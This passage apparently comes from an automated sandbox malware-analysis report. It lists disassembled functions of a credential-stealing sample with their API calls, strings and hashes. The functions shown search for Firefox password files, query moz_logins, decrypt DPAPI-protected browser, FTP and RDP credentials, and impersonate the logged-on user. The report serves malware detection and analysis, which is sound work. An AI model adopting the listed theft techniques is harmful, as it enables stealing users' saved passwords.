Instruction Fuzzy Hash: 6EB0923229830C73D900A6C79C03F9ABB8E8712BDDF404022FB04195C2A8E7F49045FE

Uniqueness

Uniqueness Score: -1.00%

Function 00403F65 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?,?,0040FBF8), ref: 00403F7A

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 7df5d39bd2bc21a575aa06a073d27cb6af8f425282ba96693159ee74942c5319
Instruction ID: aba3f0e108bbccd6d8ca16cf18e3eb1068e5b9bd50e50806624e825c33f7b6ca
Opcode Fuzzy Hash: 7df5d39bd2bc21a575aa06a073d27cb6af8f425282ba96693159ee74942c5319
Instruction Fuzzy Hash: 3EB092716502082AEA60A2959C439D6729C4784748F4001A22A59D12C2EAE5AAD046EA

Uniqueness

Uniqueness Score: -1.00%

Function 00401840 Relevance: 1.3, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000,?,00402C4E), ref: 0040184C

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: FreeLocal
String ID:
API String ID: 2826327444-0
Opcode ID: e8b050af7f5d4fe545539575eef37c7cc8d28c8bcebf108ac9adcdc01ee4e4a6
Instruction ID: 0d8446eb084247163ccf276440f997019e00a14f4af04307f291ee44eff1aacc
Opcode Fuzzy Hash: e8b050af7f5d4fe545539575eef37c7cc8d28c8bcebf108ac9adcdc01ee4e4a6
Instruction Fuzzy Hash: 0DC09B3210050C95DB017E29C94979A7AD49B1034CF40C13A670A545B1D6B8D6D0C5D8

Uniqueness

Uniqueness Score: -1.00%

Function 00401857 Relevance: 1.3, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,-00000080,?,00402BFC,00000000), ref: 00401865

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: aba469e8528c38fbaab4b91b12f2fc01ae083fd98e22b8c0648389a00a9df608
Instruction ID: 1e41da6711c349d1d124233a92d60bce5fcb9c2ff25215b5fa1125c3ceaaafcc
Opcode Fuzzy Hash: aba469e8528c38fbaab4b91b12f2fc01ae083fd98e22b8c0648389a00a9df608
Instruction Fuzzy Hash: 87B092B120020866E250AA4ACC43F5A738C9B10B4CF008025BB89A6282C8ACF89042AD

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040979C Relevance: 31.7, APIs: 11, Strings: 7, Instructions: 169filestringCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,?,0000013E,?,*.*,?), ref: 0040980C
lstrcmpiA.KERNEL32(00414FB7,?), ref: 00409839
lstrcmpiA.KERNEL32(00414FB9,?), ref: 00409856
FindNextFileA.KERNEL32(?,?,00000000,00000000,?,?,00414878,00000000,?,signons2.txt,00000000,?,signons.txt,?,?,signons.sqlite), ref: 004099EC
FindClose.KERNEL32(?,?,?,00000000,00000000,?,?,00414878,00000000,?,signons2.txt,00000000,?,signons.txt,?,?), ref: 004099FF

Part of subcall function 00401D80: lstrlen.KERNEL32(?,?,?,0040210A,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00414878,004103E4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401DA1
Part of subcall function 00401D80: lstrlen.KERNEL32(?,?,?,?,0040210A,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00414878,004103E4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401DAB
Part of subcall function 00401D80: lstrcpy.KERNEL32(00000000,?), ref: 00401DBF
Part of subcall function 00401D80: lstrcat.KERNEL32(00000000,?), ref: 00401DC8

Strings

\*.*, xrefs: 004097CC
signons3.txt, xrefs: 00409993
signons.sqlite, xrefs: 0040990B
signons2.txt, xrefs: 00409982
*.*, xrefs: 004097DB
signons.txt, xrefs: 00409971
prefs.js, xrefs: 004098C5

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
String ID: *.*$\*.*$prefs.js$signons.sqlite$signons.txt$signons2.txt$signons3.txt
API String ID: 3040542784-1405255088
Opcode ID: c0e3445f6c7bf564489c4521663a8725be2fbb8e8ef013301ba80350ce93a115
Instruction ID: 7546c2d62aa80fe2aa9564e1f970277903f6330b81d1b4f844cbc22609c5f1f3
Opcode Fuzzy Hash: c0e3445f6c7bf564489c4521663a8725be2fbb8e8ef013301ba80350ce93a115
Instruction Fuzzy Hash: A1513371515109BADF21BF21CD02EEE7A69AF44344F1080BBB808B51F2DB799EE09B5D

Uniqueness

Uniqueness Score: -1.00%

Function 00402C5B Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 100registryprocessCOMMON

Download Yara Rule

APIs

WTSGetActiveConsoleSessionId.KERNEL32(?,?,00410393), ref: 00402C94
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00402CAB
Process32First.KERNEL32(?,00000128), ref: 00402CCC
StrStrIA.SHLWAPI(?,explorer.exe), ref: 00402CE5
ProcessIdToSessionId.KERNEL32(?,00000000,?,explorer.exe,?,explorer.exe), ref: 00402D09
OpenProcess.KERNEL32(02000000,00000000,?), ref: 00402D33
OpenProcessToken.ADVAPI32(?,000201EB,?,02000000,00000000,?), ref: 00402D4B
ImpersonateLoggedOnUser.ADVAPI32(?), ref: 00402D58
RegOpenCurrentUser.ADVAPI32(000F003F,00000000), ref: 00402D79
CloseHandle.KERNEL32(?), ref: 00402DD2

Strings

explorer.exe, xrefs: 00402CD9

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: OpenProcess$SessionUser$ActiveCloseConsoleCreateCurrentFirstHandleImpersonateLoggedProcess32SnapshotTokenToolhelp32
String ID: explorer.exe
API String ID: 4004126742-3187896405
Opcode ID: f137f71e0cf7206a0a9841fe11de0cbdf895c44152ebb0cc8a0c6cd9c5e5f0c7
Instruction ID: 80f96a81feff115561b21dd2c5c1f781314d07a2527130def0814cdd83e5aabb
Opcode Fuzzy Hash: f137f71e0cf7206a0a9841fe11de0cbdf895c44152ebb0cc8a0c6cd9c5e5f0c7
Instruction Fuzzy Hash: 01312830904218ABEF219BA1DD49BEEBBB5AF04304F1440B6A109B11E1DBF99ED0DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00410194 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 135stringCOMMON

Download Yara Rule

APIs

lstrcmpiA.KERNEL32(?), ref: 004101DA
LogonUserA.ADVAPI32(?,00000000,?,00000002,00000000,00000000), ref: 004101FF
lstrlen.KERNEL32(?,?), ref: 0041021C
LCMapStringA.KERNEL32(00000400,00000100,?,00000000,?,00000000,?,?), ref: 00410233
LogonUserA.ADVAPI32(?,00000000,?,00000002,00000000,00000000), ref: 00410253
74781B10.USERENV(00000000,00000020,?,?), ref: 004102D4
ImpersonateLoggedOnUser.ADVAPI32(00000000,00000000,00000020,?,?), ref: 004102FF
RevertToSelf.ADVAPI32 ref: 00410317
74775030.USERENV(00000000,00000000), ref: 00410333
CloseHandle.KERNEL32(00000000), ref: 0041033B

Strings

123456, xrefs: 0041026F, 00410283

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: User$Logon$7477503074781CloseHandleImpersonateLoggedRevertSelfStringlstrcmpilstrlen
String ID: 123456
API String ID: 2044773668-158520161
Opcode ID: 38ac66364ed91d90a3bac56536676a16fde9495ed8b40369ce38bc4c01b687b5
Instruction ID: fb1762dc24d166e9a50452407b7b7654efa4ec112ac7bb4c164af592c2f49943
Opcode Fuzzy Hash: 38ac66364ed91d90a3bac56536676a16fde9495ed8b40369ce38bc4c01b687b5
Instruction Fuzzy Hash: 11514D70904208EBEF119F91DD4ABEEBBB4EB44304F148066E914A91A1C7F99AC4DF6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040A4C1 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 105stringencryptionCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A213: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A24C
Part of subcall function 0040A213: 757283B0.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A255

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A4F5
lstrcmpiA.KERNEL32(?,Internet Explorer), ref: 0040A57F
lstrcmpiA.KERNEL32(?,WininetCacheCredentials), ref: 0040A59E
lstrcmpiA.KERNEL32(?,MS IE FTP Passwords), ref: 0040A5BD
StrStrIA.SHLWAPI(?,DPAPI: ,?,Internet Explorer), ref: 0040A5D6
CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040A61C
LocalFree.KERNEL32(?), ref: 0040A649
757283B0.OLE32(00000000,?,DPAPI: ,?,Internet Explorer), ref: 0040A673

Strings

WininetCacheCredentials, xrefs: 0040A592
DPAPI: , xrefs: 0040A5CA
Internet Explorer, xrefs: 0040A573
MS IE FTP Passwords, xrefs: 0040A5B1

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: lstrcmpi$757283ByteCharMultiWide$CryptDataFreeLocalUnprotect
String ID: DPAPI: $Internet Explorer$MS IE FTP Passwords$WininetCacheCredentials
API String ID: 627727140-3076635702
Opcode ID: 60b1f32297af17e4e10a32dd4bc549fbb0ba2bfe9cc4c7d87dc6be52430ef8f8
Instruction ID: 794cdaff84bda6d365b61e9a8852a29cff5631a3b904cff23ad5b8ebcc9ad4bd
Opcode Fuzzy Hash: 60b1f32297af17e4e10a32dd4bc549fbb0ba2bfe9cc4c7d87dc6be52430ef8f8
Instruction Fuzzy Hash: C041087190021DEADF219E50CC06FDA7BBABF04304F0884A5B68875190DBB69AE59FD9

Uniqueness

Uniqueness Score: -1.00%

Function 0040BBA0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 140stringencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040BC57
LocalFree.KERNEL32(00000000,?), ref: 0040BC92
lstrlen.KERNEL32(ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BCD3
StrCmpNIA.SHLWAPI(?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BCE1
lstrlen.KERNEL32(http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BCEF
StrCmpNIA.SHLWAPI(?,http://,00000000,http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BCFD
lstrlen.KERNEL32(https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BD0B
StrCmpNIA.SHLWAPI(?,https://,00000000,https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BD19

Strings

ftp://, xrefs: 0040BCCE, 0040BCD9
https://, xrefs: 0040BD06, 0040BD11
http://, xrefs: 0040BCEA, 0040BCF5

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: lstrlen$CryptDataFreeLocalUnprotect
String ID: ftp://$http://$https://
API String ID: 3968356742-2804853444
Opcode ID: 331f3d6d67d61976f4712a64636ed4c548e403247095080d7d4a29aee9b52a40
Instruction ID: 8351e5f6c6a0477d6aeecf54171f9faea76a1fb005a52368d20adab0c64d5811
Opcode Fuzzy Hash: 331f3d6d67d61976f4712a64636ed4c548e403247095080d7d4a29aee9b52a40
Instruction Fuzzy Hash: 0B51D832900109FACF11AFA1ED41EEEBB76EF48314F10803AF511B11B1DBB99A90DB59

Uniqueness

Uniqueness Score: -1.00%

Function 004088CB Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 104filestringCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,?,0000013E,?,*.*,?), ref: 0040893B
lstrcmpiA.KERNEL32(00414FB7,?), ref: 00408964
lstrcmpiA.KERNEL32(00414FB9,?), ref: 00408981
FindNextFileA.KERNEL32(?,?,?,?,00000000,?,?,0000013E,?,*.*,?), ref: 00408A28
FindClose.KERNEL32(?,?,?,?,?,00000000,?,?,0000013E,?,*.*,?), ref: 00408A3B

Part of subcall function 00401D80: lstrlen.KERNEL32(?,?,?,0040210A,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00414878,004103E4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401DA1
Part of subcall function 00401D80: lstrlen.KERNEL32(?,?,?,?,0040210A,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00414878,004103E4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401DAB
Part of subcall function 00401D80: lstrcpy.KERNEL32(00000000,?), ref: 00401DBF
Part of subcall function 00401D80: lstrcat.KERNEL32(00000000,?), ref: 00401DC8

Strings

\*.*, xrefs: 004088FB
*.*, xrefs: 0040890A

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
String ID: *.*$\*.*
API String ID: 3040542784-1692270452
Opcode ID: 889b49942b60e717c5dfdc58fd796fc3f27b44c717d640296b66b767db5a688c
Instruction ID: 0aac3493151d849b9660535c2e8f243adfcc3abc402c78e02e81f0dcabda1697
Opcode Fuzzy Hash: 889b49942b60e717c5dfdc58fd796fc3f27b44c717d640296b66b767db5a688c
Instruction Fuzzy Hash: 11314971500219AADF10BF21CD02AEE77A9AF40358F5085BBB848B41F2DF789AD19F59

Uniqueness

Uniqueness Score: -1.00%

Function 0040CDA7 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 116stringencryptionCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000), ref: 0040CE4C
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0040CEB2
LocalFree.KERNEL32(00000000), ref: 0040CED9

Strings

username:s:, xrefs: 0040CDF8
full address:s:, xrefs: 0040CE1E
password 51:b:, xrefs: 0040CE0B

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: CryptDataFreeLocalUnprotectlstrlen
String ID: full address:s:$password 51:b:$username:s:
API String ID: 2920030623-2945746679
Opcode ID: 0e9fddc388509d62ac9ca2bb52fbf3cf92f52818fd0bb13f240246181c19d271
Instruction ID: 0984a1be6890704ebbff172737cff0cfc94e19684cbfdf0b232a4fc0267eb49e
Opcode Fuzzy Hash: 0e9fddc388509d62ac9ca2bb52fbf3cf92f52818fd0bb13f240246181c19d271
Instruction Fuzzy Hash: 0F415C72900109EADF11ABE1CD46BEEBB76EB48354F10413AF200751E0D7794A92EBAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040A8D7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88stringencryptionCOMMON

Download Yara Rule

APIs

CredEnumerateA.ADVAPI32(Microsoft_WinInet_*,00000000,00000000,00000000), ref: 0040A949
lstrlenW.KERNEL32(0041639C,?,?,00000000), ref: 0040A987
CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 0040A9B7
LocalFree.KERNEL32(00000000), ref: 0040A9E9
CredFree.ADVAPI32(00000000), ref: 0040AA07

Strings

Microsoft_WinInet_*, xrefs: 0040A944

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: CredFree$CryptDataEnumerateLocalUnprotectlstrlen
String ID: Microsoft_WinInet_*
API String ID: 3891647360-439986189
Opcode ID: 6bc5565b68c3fab29fc41d8dd35a86a5111eb9588d1cefe63ec32a6628ce454e
Instruction ID: ae180cc94281e80a9b3f510bb0b8c6b5d159eb8324337d50b50576de84fed9ba
Opcode Fuzzy Hash: 6bc5565b68c3fab29fc41d8dd35a86a5111eb9588d1cefe63ec32a6628ce454e
Instruction Fuzzy Hash: 75310B72900319EBDF208F80D906BEEBAB4EB04315F154437E551B22D0D7B9AAD4DF5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040AA8E Relevance: 4.6, APIs: 3, Instructions: 121stringencryptionCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 0040AAA3
CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040AB5B
LocalFree.KERNEL32(00000000), ref: 0040AB8E

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: CryptDataFreeLocalUnprotectlstrlen
String ID:
API String ID: 2920030623-0
Opcode ID: aca203fca2c292c3878eb53a2403bbf756569052ad600388594fca40a24639fc
Instruction ID: 6d2d069e92f2cc43aa6f5316afe46d378ce3715e6c7e2418831a2ac0e8414c5e
Opcode Fuzzy Hash: aca203fca2c292c3878eb53a2403bbf756569052ad600388594fca40a24639fc
Instruction Fuzzy Hash: AC31C772700205DEEF10DE94D8447DEB776EB85374F504033EA55A62C4D2BCAA92CB5E

Uniqueness

Uniqueness Score: -1.00%

Function 00404346 Relevance: 3.1, APIs: 2, Instructions: 57encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 00404392
LocalFree.KERNEL32(00000000), ref: 004043C6

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: CryptDataFreeLocalUnprotect
String ID:
API String ID: 1561624719-0
Opcode ID: 419006c8269edb1e464a434cdab2c8d40ef7aacc427657610423dade58205d01
Instruction ID: 64ccaad8e84a739c418eb17eda20de40f92f4d60509c99c6112d7b47e1b31eaf
Opcode Fuzzy Hash: 419006c8269edb1e464a434cdab2c8d40ef7aacc427657610423dade58205d01
Instruction Fuzzy Hash: 57112875A04208EBDF11CE94DC85BDEBB74FB84321F04A16AFA15662D0C3B8AA50CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00402E67 Relevance: .5, Instructions: 529COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b572f9d2c9c2a1160aa7d0b082204b5005edb68fc1495acda48a505fa1360f70
Instruction ID: b7e3113e8801cfbcad074f1540c8a22c696d16e2493e177de40566de1df7e52d
Opcode Fuzzy Hash: b572f9d2c9c2a1160aa7d0b082204b5005edb68fc1495acda48a505fa1360f70
Instruction Fuzzy Hash: C8121E73405A015BE75DCE2ECCC0692B3E3BBD826435BD63DC46AC3A45FE74B61A8648

Uniqueness

Uniqueness Score: -1.00%

Function 00412009 Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b26ebc4c7d77bafc6c35da520b3d1324df530f5d9ff365d266474bf427b053c
Instruction ID: 585ed6edc08be7f31ae12c7c837fed29d0e6329ec7f184bb6c581b3135195a8f
Opcode Fuzzy Hash: 7b26ebc4c7d77bafc6c35da520b3d1324df530f5d9ff365d266474bf427b053c
Instruction Fuzzy Hash: 8271B137F5063647E7588DAA8881155E7E2ABCC330B1B827DDE19B7381C9B4BD12C6C0

Uniqueness

Uniqueness Score: -1.00%

Function 00409442 Relevance: 36.2, APIs: 16, Strings: 8, Instructions: 238COMMON

Download Yara Rule

Strings

#2d, xrefs: 004094C5
https://, xrefs: 0040964D, 00409658
---, xrefs: 00409747
#2c, xrefs: 004094B7
http://, xrefs: 00409631, 0040963C
ftp., xrefs: 00409670, 0040967B
ftp://, xrefs: 00409615, 00409620
#2e, xrefs: 004094D3

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID:
String ID: #2c$#2d$#2e$---$ftp.$ftp://$http://$https://
API String ID: 0-1526611526
Opcode ID: c372d982930eb1be75027a304718f6181a674625a34993b384a8363f7841d544
Instruction ID: 51592c5461e711964ebbd6ab28f0f9b1264f80a8c139525cc44f247c9abd7eca
Opcode Fuzzy Hash: c372d982930eb1be75027a304718f6181a674625a34993b384a8363f7841d544
Instruction Fuzzy Hash: C5913871910109FADF11AFA1CC46BEEBAB1AF40348F24403BF101721E2D7B94E91DB49

Uniqueness

Uniqueness Score: -1.00%

Function 004091D5 Relevance: 22.7, APIs: 8, Strings: 7, Instructions: 165COMMON

Download Yara Rule

Strings

SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins, xrefs: 00409258
https://, xrefs: 0040931A, 00409325
sqlite3.dll, xrefs: 00409226
http://, xrefs: 004092FE, 00409309
mozsqlite3.dll, xrefs: 00409213
ftp., xrefs: 0040933D, 00409348
ftp://, xrefs: 004092E2, 004092ED

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID:
String ID: SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins$ftp.$ftp://$http://$https://$mozsqlite3.dll$sqlite3.dll
API String ID: 0-3560805513
Opcode ID: 4b4ab0abe1af05efa19a305ad9a7510dba107dc022380ad11772837395dd05cf
Instruction ID: 1dcba70c7437c6143af35969b0408e9c31eeae21ca1c03492374e53ac29062d3
Opcode Fuzzy Hash: 4b4ab0abe1af05efa19a305ad9a7510dba107dc022380ad11772837395dd05cf
Instruction Fuzzy Hash: FC512E30900109BADF11ABA1DC46BEF7B75AB48348F118437B911B01E3DBBD8EA1DA5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040ABA8 Relevance: 21.2, APIs: 7, Strings: 7, Instructions: 178COMMON

